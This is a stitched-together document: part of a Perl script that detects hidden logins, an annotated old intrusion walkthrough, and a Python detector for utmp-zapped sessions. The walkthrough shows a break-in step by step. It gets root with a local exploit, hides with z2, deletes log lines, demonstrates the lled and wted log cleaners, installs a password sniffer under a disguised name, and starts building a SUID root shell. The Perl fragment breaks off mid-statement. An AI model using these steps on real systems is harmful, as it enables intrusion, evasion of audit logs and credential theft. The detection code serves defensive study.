.\n";
    return undef;
}

# Build struct of ports containing port name, device num and owner.
# Note: Test run in grepstr may *not* be portable for all Unix
# types. Be forewarned! This was designed for Linux.
# Hint: For all intents and purposes, s/^$ttybase([$ttyrange][$ttyports])$/
# should return the same as what you expect in "struct utmp->ut_id".
my($grepstr) = "^($ttybase\[$ttyrange\]\[$ttyports\])\$";
my(%ports) = ();
my($user, $rdev) = ();
opendir(DEVDIR, "/dev");
my(@devfiles) = readdir(DEVDIR);
@devfiles = grep(/$grepstr/, @devfiles);
closedir(DEVDIR);
foreach (@devfiles) {
    /^$ttybase([$ttyrange][$ttyports])$/;
    if (!defined($1)) {
        print "check :: Warning! Could not extract port ID from $_.\n";
    } else {
        # uid and raw device number of the tty, owner resolved to a login name
        ($user, $rdev) = (stat("/dev/$_"))[4, 6];
        $user = getpwuid($user);
        $ports{$1} = newport($_, $rdev, $user);
    }
}

# Check ownership of /dev ports: a tty not owned by root has someone on it.
my(@logdev) = ();
foreach (sort(keys(%ports))) {
    push(@logdev, $_) if ($ports{$_}->{"owner"} ne "root");
}
@logdev = sort(@logdev);

# Check utmp (against ports detected as logged in);
my(@logutmp) = ();
foreach (sort({ $a <=> $b } keys(%entries))) {
    if (defined($entries{$_}->{"user"}) && defined($entries{$_}->{"host"}) &&
        defined($entries{$_}->{"id"}) && defined($entries{$_}->{"pid"})) {
        push(@logutmp, $entries{$_}->{"id"})
            if (($entries{$_}->{"id"} =~ /[$ttyrange][$ttyports]/) &&
                (($entries{$_}->{"user"} ne pack("a8", "")) ||
                 (($entries{$_}->{"host"} ne pack("a16", "")) &&
                  ($entries{$_}->{"id"} ne pack("a4", "")) &&
                  ($entries{$_}->{"line"} ne pack("a12", "")) &&
                  ($entries{$_}->{"pid"} > 0))));
    }
}
@logutmp = sort(@logutmp);

# Check PIDs (find processes with active port ids)
opendir(PIDDIR, "/proc");
my(%processes) = ();
my(@portprocesses) = ();
foreach (grep(/\d+/, readdir(PIDDIR))) {
    local($procdata, $cmdline);
    open(PROCFILE, "

******----> see who is on the machine
[/home/master]finger @victim.net
[victim.net]
No one logged on.

******----> good no one on, we will log on
[/home/master]telnet victim.net
Trying xxx.206.xx.140.
Connected to victim.net.
Escape character is '^]'.

Welcome to Victim Research Linux (http://www.victim.net) Red Hat 2.1
Kernel 1.2.13 on a i586

ns.victim.net login: jnsmith
Password:
Linux 1.2.13.
You have new mail.

******----> Don't read his mail, you can cat all mail in /var/spool/mail
and in each user's /home/username/mail directory

******----> Check again to see if anyone is on
[jnsmith@ns jnsmith]$ w
5:36am up 18 days, 8:23, 1 user, load average: 0.01, 0.00, 0.00
User     tty    login@  idle  JCPU  PCPU  what
jnsmith  ttyp1  5:35am                    w

******----> Just me, let's get root and get lost in the utmp!
[jnsmith@ns jnsmith]$ cd .term

******----> Nice directory to hide stuff ;)
[jnsmith@ns .term]$ ./.u

******----> I had this already waiting, it was the umounc.c exploit
Discovered and Coded by Bloodmask and Vio, Covin 1996

******----> We are now root, let's use z2 to become invisible
bash# z2 jnsmith
Zap2!

******----> Let's see if we are still on.
bash# w
5:37am up 18 days, 8:24, 0 users, load average: 0.08, 0.02, 0.01
User     tty    login@  idle  JCPU  PCPU  what

******----> Hmm. Now there is no one on the system, I must have logged off ;)

******----> We know we are root, but let's check what you can see.
bash# whoami
root
bash#

******----> Yup, root. What directory are we in?
bash# pwd
/home/jnsmith/.term

******----> Let's check the logs
bash# cd /var/log

******----> most of the time in /var/adm, this box uses /var/log
bash# grep dormroom *
maillog:Jan 29 05:31:58 ns in.telnetd[22072]: connect from dormroom.playhouse.com
maillog:Jan 29 05:35:29 ns in.telnetd[22099]: connect from dormroom.playhouse.com

******----> Yup, the z2 took care of everything but this maillog.
bash# pico maillog

******----> in pico I did a ctrl w, and searched for dormroom then ctrl k to
delete lines

******----> These were the lines deleted
Jan 29 05:31:58 ns in.telnetd[22072]: connect from dormroom.playhouse.com
Jan 29 05:35:29 ns in.telnetd[22099]: connect from dormroom.playhouse.com

bash# grep dormroom *

******----> Yup. All clear ;)
bash# w
5:41am up 18 days, 8:27, 0 users, load average: 0.00, 0.00, 0.00
User     tty    login@  idle  JCPU  PCPU  what

******----> Yup. All clear here too ;)

******----> Let's show you how you would use lled and wted if the grep would
have shown something in those files
bash# cd ~jnsmith/.term
bash# lled
bash# lled -c dormroom.playhouse
Entries stored: 527 Entries removed: 0
Now chmod lastlog.tmp and copy over the original /var/log/lastlog

******----> Nothing in the lastlog
bash#
bash# wted -e jnsmith
Entries stored: 254 Entries removed: 0
Now chmod wtmp.tmp and copy over the original /var/log/wtmp

******----> Nothing in the wtmp, both of these would have shown in the grep
we just did in the /var/log (just showing you the commands)

******----> Let's do some sniffing.
bash# pico linsniffer.c

******----> I changed this line to tell where I want the log to go:
#define TCPLOG "/tmp/.pinetemp.000"

******----> let's look at what is running to think of a name that
looks almost like it belongs there
bash# ps -aux
root   143  0.0 0.0   84    0 ?   SW  Jan 10 0:01 (lpd)
root   154  0.0 0.0  118    0 ?   SW  Jan 10 0:00 (smbd)
root   163  0.0 0.5   76  176 ?   S   Jan 10 0:00 nmbd -D
root   197  0.0 0.0   76    0 v03 SW  Jan 10 0:00 (getty)
root   198  0.0 0.0   76    0 v04 SW  Jan 10 0:00 (getty)
root   199  0.0 0.0   76    0 v05 SW  Jan 10 0:00 (getty)
root   200  0.0 0.0   76    0 v06 SW  Jan 10 0:00 (getty)
root   201  0.0 0.0   88    0 s00 SW  Jan 10 0:00 (uugetty)
root   209  0.0 0.2   35   76 ?   S   Jan 10 0:01 (update)
root   210  0.0 0.3   35  124 ?   S   Jan 10 0:03 update (bdflush)
root 10709  0.0 1.4  152  452 ?   S   Jan 27 0:10 httpd
root 11111  0.0 1.4  152  452 ?   S   Jan 27 0:07 httpd
root 14153  0.0 0.8   70  268 ?   S   Jan 16 0:03 ./inetd
root 14307  0.0 4.7 1142 1484 ?   S   Jan 16 1:16 ./named
root 14365  0.0 0.0   76    0 v02 SW  Jan 16 0:00 (getty)
root 17367  0.0 1.4  152  452 ?   S   11:01  0:02 httpd

******----> let's compile it and name it nmb
bash# gcc linsniffer.c -o nmb

******----> let's load it.
bash# nmb&
[1] 22171

******----> let's check the log file in /tmp
bash#
bash# cd /tmp
bash# ls -al .pin*
total 15691
-rw-rw-r--   1 root     jnsmith         0 Jan 29 05:50 .pinetemp.000

******----> There it is, but we don't want our login to know about it!
bash# chgrp root .pin*

******----> Let's look now.
bash# ls -al .pin*
-rw-rw-r--   1 root     root            0 Jan 29 05:50 .pinttemp.000
bash#

******----> This is good, let's make an SUID shell so we don't have to
do this again. (check for MD5 or other programs in the cron)
bash# cd /bin
bash# ls -l sh
lrwxrwxrwx   1 root     root            4 Mar  1  1996 sh -> bash

******----> This is a sym link.
bash# ls -l bash
-rwxr-xr-x   1 root     root       299296 Nov  2  1995 bash

******----> here is the real file
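The Perl check at the top and the z2 step in the session rest on the same fact: removing a utmp record does nothing to the tty device, which keeps the user's uid as owner, so `w` reports 0 users while a shell is still attached. The Python below is an added example (not the page's Perl script or any tool it names) that reimplements that cross-check; the `struct utmp` layout is assumed to be glibc on x86-64 Linux, and the utmp image and tty-owner table it runs on are constructed sample data.

```python
import os
import pwd
import struct
from typing import Dict, List, Tuple

# glibc struct utmp on x86-64 Linux (384 bytes). Assumed layout; compare with
# /usr/include/bits/utmp.h on the host before reading its real /var/run/utmp.
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)   # 384
USER_PROCESS = 7                        # ut_type of an interactive login


def _cstr(raw: bytes) -> str:
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def parse_utmp(data: bytes) -> List[dict]:
    """Decode every whole record of a utmp/wtmp image into a dict."""
    recs = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        recs.append({"type": f[0], "pid": f[1], "line": _cstr(f[2]),
                     "user": _cstr(f[4]), "host": _cstr(f[5])})
    return recs


def hidden_sessions(recs: List[dict], tty_owners: Dict[str, str]) -> List[Tuple[str, str]]:
    """(tty, owner) for every non-root-owned tty that utmp does not list as a login."""
    # a zapped utmp entry leaves the tty's uid untouched: that mismatch is the signal
    listed = {r["line"] for r in recs if r["type"] == USER_PROCESS and r["user"]}
    return sorted((tty, who) for tty, who in tty_owners.items()
                  if who != "root" and tty not in listed)


def live_tty_owners(devdir: str = "/dev/pts") -> Dict[str, str]:
    """Owner of each pty on this host, keyed the way ut_line names it ('pts/3')."""
    return {"pts/" + e.name: pwd.getpwuid(e.stat().st_uid).pw_name
            for e in os.scandir(devdir) if e.name.isdigit()}


def make_record(ut_type: int, pid: int, line: str, user: str, host: str = "") -> bytes:
    """One constructed utmp record (sample data, not captured from a real host)."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), line[-4:].encode(),
                       user.encode(), host.encode(), *([0] * 9))


def demo() -> List[Tuple[str, str]]:
    """Constructed scenario: alice's login is recorded, jnsmith's ttyp1 entry is gone."""
    image = make_record(USER_PROCESS, 4021, "ttyp2", "alice", "desk.example.net")
    owners = {"ttyp1": "jnsmith", "ttyp2": "alice", "ttyp3": "root"}
    return hidden_sessions(parse_utmp(image), owners)   # -> [("ttyp1", "jnsmith")]
```

On a live host, `hidden_sessions(parse_utmp(open("/var/run/utmp", "rb").read()), live_tty_owners())` gives the same comparison the Perl fragment builds from /dev and utmp; a non-empty result deserves a look at the owning process before anything else is trusted.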